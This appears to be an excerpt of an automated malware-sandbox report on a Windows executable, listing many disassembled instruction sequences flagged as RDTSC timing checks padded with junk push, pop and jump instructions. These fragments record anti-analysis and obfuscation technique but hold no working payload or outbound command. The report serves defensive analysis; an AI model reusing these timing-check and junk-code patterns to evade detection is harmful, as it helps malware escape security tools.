Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7A0350 second address: 7A0381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FED7550886Fh 0x0000000b pushad 0x0000000c jmp 00007FED75508879h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7A2AD2 second address: 7A2B3A instructions: 0x00000000 rdtsc 0x00000002 jg 00007FED74F3E51Ch 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jng 00007FED74F3E516h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push esi 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007FED74F3E520h 0x0000001f pop esi 0x00000020 jne 00007FED74F3E535h 0x00000026 jmp 00007FED74F3E51Dh 0x0000002b push esi 0x0000002c push edx 0x0000002d pop edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7C319C second address: 7C31CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FED75508878h 0x0000000b jmp 00007FED75508870h 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7C31CD second address: 7C31DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 jnl 00007FED74F3E516h 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7C31DD second address: 7C31E2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7C5977 second address: 7C597B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7C597B second address: 7C5999 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FED75508878h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7C5999 second address: 7C59B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E521h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7C59B0 second address: 7C59B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7DDB67 second address: 7DDB7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 jo 00007FED74F3E516h 0x0000000e pop ebx 0x0000000f popad 0x00000010 push ecx 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7DDE23 second address: 7DDE2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007FED75508866h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7DDE2F second address: 7DDE33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7DE431 second address: 7DE435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7DE6F8 second address: 7DE70C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FED74F3E516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jnp 00007FED74F3E516h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7DE8AF second address: 7DE8B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7DE8B5 second address: 7DE8D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push edx 0x00000008 jmp 00007FED74F3E51Fh 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7E1602 second address: 7E1609 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7E1B88 second address: 7E1C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FED74F3E526h 0x0000000b nop 0x0000000c mov edx, 7765BC42h 0x00000011 push dword ptr [ebp+122D3510h] 0x00000017 or edx, dword ptr [ebp+1251D257h] 0x0000001d call 00007FED74F3E519h 0x00000022 jnl 00007FED74F3E538h 0x00000028 push eax 0x00000029 pushad 0x0000002a jno 00007FED74F3E518h 0x00000030 push eax 0x00000031 pushad 0x00000032 popad 0x00000033 pop eax 0x00000034 popad 0x00000035 mov eax, dword ptr [esp+04h] 0x00000039 jmp 00007FED74F3E528h 0x0000003e mov eax, dword ptr [eax] 0x00000040 push esi 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7E2E01 second address: 7E2E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7E2E0A second address: 7E2E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E528h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7E667E second address: 7E6684 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E90020 second address: 4E90093 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FED74F3E520h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FED74F3E51Bh 0x0000000f add cx, 563Eh 0x00000014 jmp 00007FED74F3E529h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e jmp 00007FED74F3E521h 0x00000023 xchg eax, ebp 0x00000024 jmp 00007FED74F3E51Eh 0x00000029 mov ebp, esp 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FED74F3E51Ah 0x00000034 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E90093 second address: 4E90099 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E90099 second address: 4E9009F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E9009F second address: 4E900D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508878h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FED7550886Dh 0x00000014 mov ebx, esi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70E00 second address: 4E70E06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70E06 second address: 4E70E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70E0A second address: 4E70E0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70E0E second address: 4E70E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70E1D second address: 4E70E21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70E21 second address: 4E70E27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EC010A second address: 4EC011C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED74F3E51Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EC011C second address: 4EC0120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EC0120 second address: 4EC014B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007FED74F3E529h 0x00000011 pop ecx 0x00000012 mov dx, 63B4h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EC014B second address: 4EC0151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EC0151 second address: 4EC0155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EC0155 second address: 4EC0159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EC0159 second address: 4EC016A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EC016A second address: 4EC0170 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EC0170 second address: 4EC0175 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EC0175 second address: 4EC018C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a mov al, bl 0x0000000c mov ax, CE7Bh 0x00000010 popad 0x00000011 pop ebp 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EC018C second address: 4EC0190 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EC0190 second address: 4EC01AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FED75508872h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E500B6 second address: 4E500BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E500BA second address: 4E500D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508874h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E500D2 second address: 4E5010C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, A954h 0x00000007 push edi 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FED74F3E521h 0x00000016 adc ah, FFFFFFC6h 0x00000019 jmp 00007FED74F3E521h 0x0000001e popfd 0x0000001f mov dl, ch 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E5010C second address: 4E50126 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov esi, 7460D15Fh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50126 second address: 4E5016F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 pushfd 0x00000007 jmp 00007FED74F3E527h 0x0000000c or esi, 6F45CB5Eh 0x00000012 jmp 00007FED74F3E529h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E5016F second address: 4E50173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50173 second address: 4E50186 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E51Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50186 second address: 4E5018C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E5018C second address: 4E50190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50190 second address: 4E501BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FED75508875h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70C2A second address: 4E70C5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FED74F3E51Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FED74F3E51Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70C5F second address: 4E70C65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70C65 second address: 4E70C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70C69 second address: 4E70C6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E706D4 second address: 4E706F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E706F1 second address: 4E70727 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FED7550886Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov ch, dl 0x00000013 movzx eax, dx 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov si, CE6Dh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70727 second address: 4E7072C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E7072C second address: 4E70793 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FED7550886Fh 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007FED75508879h 0x0000000f or esi, 511A4726h 0x00000015 jmp 00007FED75508871h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov ebp, esp 0x00000020 jmp 00007FED7550886Eh 0x00000025 pop ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FED7550886Ah 0x0000002f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70793 second address: 4E70799 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E705E9 second address: 4E7068E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edi, esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c mov eax, 79897433h 0x00000011 jmp 00007FED75508878h 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007FED7550886Bh 0x0000001d xchg eax, ebp 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FED75508874h 0x00000025 adc ecx, 5B464698h 0x0000002b jmp 00007FED7550886Bh 0x00000030 popfd 0x00000031 pushfd 0x00000032 jmp 00007FED75508878h 0x00000037 xor ax, F0F8h 0x0000003c jmp 00007FED7550886Bh 0x00000041 popfd 0x00000042 popad 0x00000043 mov ebp, esp 0x00000045 pushad 0x00000046 jmp 00007FED75508874h 0x0000004b push eax 0x0000004c push edx 0x0000004d mov ah, 0Dh 0x0000004f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70356 second address: 4E70373 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70373 second address: 4E70385 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 mov ebx, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70385 second address: 4E70389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70389 second address: 4E7038F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E7038F second address: 4E703A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, AAh 0x00000005 mov ah, bl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 mov eax, 4591B2A1h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E703A5 second address: 4E7041A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508877h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FED75508876h 0x0000000f mov ebp, esp 0x00000011 jmp 00007FED75508870h 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a movsx edi, ax 0x0000001d pushfd 0x0000001e jmp 00007FED75508876h 0x00000023 or ecx, 3168E228h 0x00000029 jmp 00007FED7550886Bh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E801A0 second address: 4E801FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FED74F3E51Bh 0x00000009 and ch, 0000006Eh 0x0000000c jmp 00007FED74F3E529h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007FED74F3E520h 0x00000018 jmp 00007FED74F3E525h 0x0000001d popfd 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 xchg eax, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E801FD second address: 4E80201 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E80201 second address: 4E80207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E80207 second address: 4E80268 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 1CC7h 0x00000007 push esi 0x00000008 pop edi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e pushad 0x0000000f jmp 00007FED75508874h 0x00000014 pushfd 0x00000015 jmp 00007FED75508872h 0x0000001a sbb ecx, 0192BFD8h 0x00000020 jmp 00007FED7550886Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FED75508875h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EC000E second address: 4EC004A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 push edi 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FED74F3E522h 0x00000012 add cx, 2E68h 0x00000017 jmp 00007FED74F3E51Bh 0x0000001c popfd 0x0000001d popad 0x0000001e mov dword ptr [esp], ebp 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 mov esi, 3988B82Dh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EC004A second address: 4EC00BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FED75508872h 0x0000000f sbb si, 2BF8h 0x00000014 jmp 00007FED7550886Bh 0x00000019 popfd 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e mov ax, 1D4Bh 0x00000022 mov edx, esi 0x00000024 popad 0x00000025 pop ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FED7550886Fh 0x0000002f xor eax, 4D5E2C6Eh 0x00000035 jmp 00007FED75508879h 0x0000003a popfd 0x0000003b movzx esi, di 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EC00BF second address: 4EC00DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED74F3E529h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EC00DC second address: 4EC00E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E9040F second address: 4E9043F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E51Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FED74F3E526h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov si, DD5Fh 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E9043F second address: 4E90444 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
